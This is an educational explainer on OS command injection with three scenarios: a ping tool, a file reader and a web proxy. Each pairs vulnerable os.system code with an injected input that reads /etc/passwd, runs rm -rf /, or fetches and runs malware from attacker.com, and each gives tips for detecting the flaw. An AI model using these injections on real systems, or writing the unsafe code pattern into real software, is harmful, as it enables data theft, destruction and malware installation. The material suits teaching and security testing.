OS command injection is a type of application vulnerability that allows an attacker to execute arbitrary system commands in the context of the server process. Let's examine this in detail with three scenarios:

1. Scenario 1: Network Diagnostics Tool
   • Explanation: Suppose a web application provides a network diagnostic tool that lets users ping other servers and view the results. The server-side code takes the IP address from the user, appends it to the ping command, and executes it.
   • Code: os.system("ping " + user_input)
   • Attack: The attacker enters 8.8.8.8; cat /etc/passwd. This executes the ping command and then lists out the contents of the /etc/passwd file, exposing sensitive information.
   • Identification: You could identify this vulnerability during penetration testing by inputting command sequences (e.g., ;, &&, ||) after the IP address. If the output includes the results of the command, then the application is vulnerable.
2. Scenario 2: File Retrieval System
   • Explanation: A web application lets users retrieve the contents of their files. The server-side code takes a filename from the user, appends it to the cat command, and executes it.
   • Code: os.system("cat " + user_input)
   • Attack: The attacker inputs important.txt; rm -rf /. This retrieves the important.txt file and then deletes all files in the root directory.
   • Identification: To identify this, enter a filename followed by command sequences. If the output contains the results of the command or if the server's files are changed (in the case of a delete command), then the application is vulnerable.
3. Scenario 3: Web Proxy
   • Explanation: A web application provides a web proxy feature. The server-side code takes a URL from the user, appends it to the curl command, and executes it.
   • Code: os.system("curl " + user_input)
   • Attack: The attacker inputs http://example.com; wget <http://attacker.com/malware> -O /tmp/mal_tool; chmod +x /tmp/mal_tool; /tmp/mal_tool. This fetches the example.com webpage and then downloads a malicious tool, makes it executable, and runs it.
   • Identification: During penetration testing, enter a URL followed by command sequences. If the server's behavior changes based on the command (e.g., downloading a file or changing file permissions), then the application is vulnerable.